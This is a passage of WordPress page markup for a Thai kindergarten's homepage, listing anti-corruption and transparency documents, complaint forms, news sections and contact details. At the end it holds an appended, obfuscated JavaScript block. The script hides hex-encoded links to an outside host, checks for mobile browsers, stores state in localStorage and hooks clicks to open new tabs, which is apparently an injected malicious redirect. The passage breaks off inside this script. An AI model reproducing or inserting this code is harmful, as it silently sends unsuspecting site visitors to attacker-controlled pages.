900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| 